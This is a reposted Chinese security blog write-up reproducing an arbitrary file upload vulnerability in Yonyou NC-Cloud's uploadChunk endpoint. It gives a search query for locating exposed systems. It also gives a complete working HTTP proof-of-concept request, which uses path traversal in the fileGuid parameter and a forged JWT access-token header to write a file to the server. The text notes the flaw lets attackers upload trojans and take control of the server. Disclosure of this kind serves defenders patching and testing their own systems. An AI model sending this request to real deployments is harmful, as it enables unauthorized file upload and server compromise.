【漏洞复现】用友NC-Cloud系统uploadChunk存在任意文件上传漏洞

admin 2024年2月14日22:00:48评论29 views字数 1181阅读3分56秒阅读模式
  • 0x01 阅读须知

花果山的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!!
  • 0x02 产品介绍

用友NC是“企业资源规划(Enterprise Resource Planning)”的缩写,是指用友软件股份有限公司开发的一套企业管理软。用友NC系统是一种集成管理企业各项业务流程的信息化解决方案。该系统涵盖了财务、人力资源、供应链管理等多个方面,旨在帮助企业提高运营效率、优化资源利用、提升管理水平。
  • 0x03 漏洞描述

用友NC Cloud uploadChunk文件存在任意文件上传漏洞,攻击者通过此漏洞可实现上传木马文件,控制服务器。
  • 0x04 漏洞影响

未知

  • 0x05 复现环境

app="用友-NC-Cloud"

【漏洞复现】用友NC-Cloud系统uploadChunk存在任意文件上传漏洞

  • 0x06 漏洞复现

POC如下:

POST /ncchr/pm/fb/attachment/uploadChunk?fileGuid=/../../../nccloud/&chunk=1&chunks=1 HTTP/1.1Host:User-Agent: Mozilla/4.0 (Mozilla/4.0; MSIE 7.0; Windows NT 5.1; FDM; SV1; .NET CLR 3.0.04506.30)Accept-Encoding: gzip, deflateAccept: */*Connection: closeaccessTokenNcc: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyaWQiOiIxIn0.F5qVK-ZZEgu3WjlzIANk2JXwF49K5cBruYMnIOxItOQContent-Length: 148Content-Type: multipart/form-data; boundary=de7a6692c03f903d173515933ee6f161--de7a6692c03f903d173515933ee6f161Content-Disposition: form-data; name="file"; filename="test.txt"test--de7a6692c03f903d173515933ee6f161--

poc中存在一个请求头:accessTokenNcc,该请求头为JWT,详情请点击原文查看。

【漏洞复现】用友NC-Cloud系统uploadChunk存在任意文件上传漏洞

返回操作成功即证明上传成功,访问test.txt确认。

【漏洞复现】用友NC-Cloud系统uploadChunk存在任意文件上传漏洞

上传成功,至此漏洞复现结束。

原文始发于微信公众号(花果山讲安全):【漏洞复现】用友NC-Cloud系统uploadChunk存在任意文件上传漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年2月14日22:00:48
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【漏洞复现】用友NC-Cloud系统uploadChunk存在任意文件上传漏洞http://cn-sec.com/archives/2489529.html

发表评论

匿名网友 填写信息